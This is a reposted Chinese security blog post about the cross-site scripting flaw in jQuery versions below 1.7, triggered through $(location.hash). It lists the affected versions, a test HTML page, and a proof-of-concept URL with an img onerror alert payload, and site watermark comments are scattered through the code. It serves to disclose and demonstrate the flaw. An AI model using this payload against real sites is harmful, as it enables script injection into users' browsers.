安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > WEB安全 > jQuery跨站脚本漏洞XSS with $(location.hash)漏洞

jQuery跨站脚本漏洞XSS with $(location.hash)漏洞

时间:2017-10-23来源:未知 作者:安云网点击:
jquery下载地址: https://code.jquery.com/jquery/ 影响范围: 版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCATION.HASH跨站漏洞 已测试成功版本: jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.js jquery-1.5所有版

jquery下载地址:https://code.jquery.com/jquery/ //内容来自安云网


//本文来自安云网

影响范围:

//本文来自安云网

    版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCATION.HASH跨站漏洞

//内容来自AnYun.ORG

已测试成功版本:

//本文来自安云网

    jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.js

//内容来自安云网

    jquery-1.5所有版本

//本文来自安云网

    jquery-1.4所有版本 //内容来自AnYun.ORG

    jquery-1.3所有版本 //本文来自安云网

    jquery-1.2所有版本 //内容来自AnYun.ORG

测试: //内容来自AnYun.ORG

启动nginx,并建立index.html页面,内容如下: //内容来自安云网

漏洞发现者给的测试代码: //本文来自安云网

<html>

//本文来自安云网

<head>

//内容来自AnYun.ORG

    <title>JQuery-xss-test</title>

//内容来自AnYun.ORG

    <script src="https://code.jquery.com/jquery-1.6.1.min.js"></script>

//内容来自AnYun.ORG

    <script> //本文来自安云网

    $(function(){ //内容来自安云网

    try { $(location.hash) } catch(e) {}

//内容来自安云网

    }) //内容来自AnYun.ORG

    </script>

//本文来自安云网

</head>

//内容来自安云网

<body>

//内容来自安云网

    Jquery xss test.

//内容来自安云网

</body> //本文来自安云网

</html> //内容来自安云网

访问地址: //内容来自安云网

http://localhost/#<img src=/ onerror=alert(/F4ckTeam/)>

//本文来自安云网

测试截图:

//内容来自安云网

jQuery跨站脚本漏洞XSS with $(location.hash)漏洞

//本文来自安云网


//本文来自安云网


//内容来自安云网

本文出自 “Mask_X 博客” 博客,请务必保留此出处http://zhpfbk.blog.51cto.com/4757027/1878396

//本文来自安云网


//本文来自安云网

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容